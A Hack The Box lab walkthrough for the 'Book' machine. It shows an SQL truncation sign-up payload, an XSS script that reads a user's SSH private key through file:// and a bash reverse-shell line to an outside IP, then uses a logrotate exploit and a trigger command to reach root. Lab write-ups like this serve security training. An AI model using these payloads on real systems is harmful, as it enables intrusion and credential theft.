HTB Walkthrough Book 10.10.10.176
Summary
Foothold
After the Nmap scan we see there are only 2 ports open. after poking around we discover the sign up page is vulnerable to an SQL truncation Attack
User
Once we are logged into the admin and normal site we discover an XSS vulnerability, cause this vulnerability we were able to get the id_rsa key and login to the box
Root
After some enumeration we discover there is a vulnerability in the log rotate application after exploiting this we were able to take over the machine completely.
Enumeration
Nmap
nmap -sC -sV -p- 10.10.10.176
Web
10.10.10.176
http://10.10.10.176/admin
Turns out it’s vulnerable to sql truncation:
intercepting this request with burp so we can edit it and use the sql truncation attack:
admin%20%20%20%20%20x&email=admin%40book.htb%20%20%20%20%20%20x&password=12345678
admin@book.htb:12345678
XSS attack
10.10.10.176/admin
10.10.10.176
<script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText.fontsize(1)) }; x.open("GET","file:///home/reader/.ssh/id_rsa"); x.send(); </script>10.10.10.176/admin
open the collections
and we get our rsa key:
Note: of course we did some more enum with our LFI, thats why we know we need reader as user.
chmod 600 id_rsa
Privilege Escalation
After some enumeration it turns out we found the folowing vulnerability
https://www.exploit-db.com/exploits/47466
compile exploit:
gcc -o exploit exploit.ccreate a bash script with reversed shell:
!/bin/bash
bash -i >& /dev/tcp/10.10.14.25/443 0>&1
nc -lvp 443
./exploit -p shell.sh /home/reader/backups/access.log
to speed things a bit up I login with another shell and execute the folowing command to trigger the log rotation
echo rotateme >> /home/reader/backups/access.log
shell was unstable so since there is a id_rsa key I decided to grab that one when the root shell popped up
chmod + 600 root_id
ssh -i root_id root@10.10.10.176
Made by s3cwalk
Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.